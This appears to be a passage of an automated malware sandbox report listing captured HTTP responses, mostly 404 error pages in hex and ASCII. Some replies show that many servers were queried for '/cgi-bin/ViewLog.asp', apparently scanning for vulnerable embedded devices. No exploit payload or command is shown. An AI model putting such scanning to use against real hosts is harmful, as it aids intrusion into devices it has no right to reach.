4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 3c 66 6f 72 6d 20 6e 61 6d 65 3d 27 66 6f 72 6d 6e 61 6d 65 27 20 61 63 74 69 6f 6e 3d 27 70 74 69 6d 65 6f 75 74 2e 63 6d 64 27 20 6d 65 74 68 6f 64 3d 27 70 6f 73 74 27 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 27 68 69 64 64 65 6e 27 20 76 61 6c 75 65 3d 27 27 20 2f 3e 3c 2f 66 6f 72 6d 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE><script language='JavaScript'>function cancelevent(){document.formname.submit();}</script></HEAD><BODY BGCOLOR="#cc9999" onload=cancelevent() ><H4>404 Not Found</H4><form name='formname' action='ptimeout.cmd' method='post'><input type='hidden' value='' /></form>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.16.1Date: Sun, 23 Oct 2022 15:58:00 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.13.6.1Date: Sun, 23 Oct 2022 15:58:00 GMTContent-Type: text/htmlContent-Length: 175Connection: keep-aliveCache-Control: no-cacheAccess-Control-Allow-Origin: *Access-Control-Allow-Credentials: trueAccess-Control-Allow-Methods: GETAccess-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-TypeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Sun, 23 Oct 2022 15:57:46 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 11:25:29 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Sun, 23 Oct 2022 16:03:14 GMTContent-Length: 1282Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3a 20 61 72 63 68 69 76 6f 20 6f 20 64 69 72 65 63 74 6f 72 69 6f 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 6f 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 11:58:00 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.2.9Date: Sun, 23 Oct 2022 15:58:03 GMTContent-Type: text/htmlContent-Length: 168Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 39 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.2.9</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:58:04 GMTServer: Apache/2.4.6 (CentOS) PHP/7.4.10Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 38 3a 30 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 36 20 28 43 65 6e 74 4f 53 29 20 50 48 50 2f 37 2e 34 2e 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>HTTP/1.1 400 Bad RequestDate: Sun, 23 Oct 2022 15:58:04 GMTServer: Apache/2.4.6 (CentOS) PHP/7.4.10Content-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.20.1Date: Sun, 23 Oct 2022 15:58:04 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.20.1</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:58:04 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 23 Oct 2022 15:58:04 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0Date: Sun, 23 Oct 2022 16:00:18 GMTX-Frame-Options: sameoriginContent-Security-Policy: frame-ancestors 'self'
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:58:05 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Sun, 23 Oct 2022 15:58:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 38 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 19 9a e8 19 21 2b d1 07 59 02 32 54 1f ea 40 00 da 1e 3f 07 a9 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 84(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!+Y2T@?0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 16:58:05 GMTServer: WebsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockCache-Control: no-storeContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:58:06 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.1.33Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 38 3a 30 36 20 47 4d Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this 